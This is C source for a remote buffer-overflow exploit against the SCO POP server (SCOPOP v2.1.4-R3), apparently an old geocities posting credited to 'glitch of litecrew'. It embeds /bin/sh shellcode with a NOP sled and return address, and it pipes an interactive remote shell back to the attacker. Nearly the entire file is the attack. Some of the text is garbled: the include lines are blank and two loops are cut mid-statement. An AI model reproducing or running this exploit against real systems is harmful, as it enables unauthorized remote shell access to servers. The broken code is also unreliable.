/*
 *        Remote pop exploit for SCO systems.
 *        by glitch of litecrew.
 *        Ripped  from Miroslaw Grzybek's code.
 */

#include        
#include        
#include        
#include        
#include        
#include        
#include         
#include        
#include        

char *shell=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define ADDR 0x80474b4
#define OFFSET 0
#define BUFLEN 1200

char    buf[BUFLEN];
int     offset=OFFSET;
int     nbytes;
int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;
short a;
void main (int argc, char *argv[]) {
        int i;
        if(argc<2) {
                printf("Usage: %s  [offset]\n",argv[0]);
                printf("Default offset is 0. It works against SCOPOP v2.1.4-R3\n");
                exit(0);
        }
        if(argc>2)
                offset=atoi(argv[2]);
        memset(buf,0x90,BUFLEN);
        memcpy(buf+800,shell,strlen(shell));
        for(i=901;ih_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0);
        }
        printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
        write(sock,buf,strlen(buf));
        while(1) {
                fd_set input;

                FD_SET(0,&input);
                FD_SET(sock,&input);
                if((select(sock+1,&input,NULL,NULL,NULL))<0) {
                        if(errno==EINTR) continue;
                        printf("CONNECTION CLOSED...\n"); fflush(stdout);
                        exit(1);
                }
                if(FD_ISSET(sock,&input)) {
                        nbytes=read(sock,buf,BUFLEN);
                        for(i=0;i126) || (a<32)) ){
                             buf[i]=' ';
                           }
                         }
                        write(1,buf,nbytes);
                }
                if(FD_ISSET(0,&input))
                        write(sock,buf,read(0,buf,BUFLEN));
        }
}

    Source: geocities.com/f173s